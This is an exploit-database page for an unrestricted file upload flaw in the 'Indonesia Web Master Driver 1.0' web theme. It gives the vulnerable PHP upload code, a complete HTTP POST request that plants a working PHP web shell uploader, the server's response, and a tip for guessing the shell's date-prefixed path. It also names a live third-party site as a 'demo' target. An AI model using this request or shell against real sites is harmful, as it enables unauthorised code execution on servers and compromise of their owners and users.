Advertisement






Indonesia Web Master Driver 1.0 - Shell Upload

CVE Category Price Severity
N/A CWE-434 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2022-10-12
CVSS
Not available

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022100031

Below is a copy:

Indonesia Web Master Driver 1.0 - Shell Upload
# Exploit Title: Indonesia Web Master Driver 1.0 - Shell Upload
# Date: 10-10-2022
# Exploit Author: X-DEX
# Vendor Homepage:
https://themeforest.net/user/webmasterdriver
# Version: v1.0
# Tested on: Kali Linux

----- POC -----

Note : vulnerability at http://localhost/registact.php
"
$image1=$_FILES["img1"]["name"];
$image2=$_FILES["img2"]["name"];
$newimg1 = date('dmYHis').$image1;
$newimg2 = date('dmYHis').$image2;
move_uploaded_file($_FILES["img1"]["tmp_name"],"image/id/".$newimg1);
move_uploaded_file($_FILES["img2"]["tmp_name"],"image/id/".$newimg2);
"
---------------
Request : URL - http://localhost/registact.php
===============
use burpsuite

POST /registact.php HTTP/1.1
Host: http://localhost
Content-Length: 1007
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLBXMHTxHs8OmgM8w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundaryLBXMHTxHs8OmgM8w
Content-Disposition: form-data; name="MAX_FILE_SIZE"

512000
------WebKitFormBoundaryLBXMHTxHs8OmgM8w
Content-Disposition: form-data; name="img1"; filename="m.php"
Content-Type: application/x-php

<?php
 echo "<body bgcolor=black>";
echo "<p><div align=center><font color=#ff9933 font size=6> <3 INDI</font><font color=white font size=6>SHELL</font><font color=green font size=6>=FTW <3 </font><p><form method=post enctype=multipart/form-data name=uploader >"; 
echo "<input type=file name=file size=50>&nbsp&nbsp&nbsp&nbsp<input  type=submit  name=sut value=Upload></form>"; 
if( isset($_POST['sut']) )
 {
      if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name']))
       { 
     echo "<font color=red size=2 face=\"comic sans ms\">upload done :D<br><br>"; 
     }   
       else {
     echo "<font color=red size=2 face=\"comic sans ms\">Upload failed :P<br>"; 
     } 
         } 
 ?>
------WebKitFormBoundaryLBXMHTxHs8OmgM8w--

Response

HTTP/1.1 200 OK
Connection: close
x-powered-by: localhost
set-cookie: PHPSESSID=164455c4fc628fc476d48023c0f44e2e; path=/
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
content-type: text/html; charset=UTF-8
Content-Length: 153
vary: Accept-Encoding,User-Agent
date: Tue, 11 Oct 2022 02:21:20 GMT
server: LiteSpeed
x-xss-protection: 1; mode=block
x-content-type-options: nosniff

<script>alert('Email sudah terdaftar, silahkan gunakan email lain!');</script><script type='text/javascript'> document.location = 'regist.php'; </script>

shell access = http://localhost/image/id/date('dmYHis')m.php
date('dmYHis') use your brain hihihihi
Demo site : https://panjitrans.net/registact.php

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.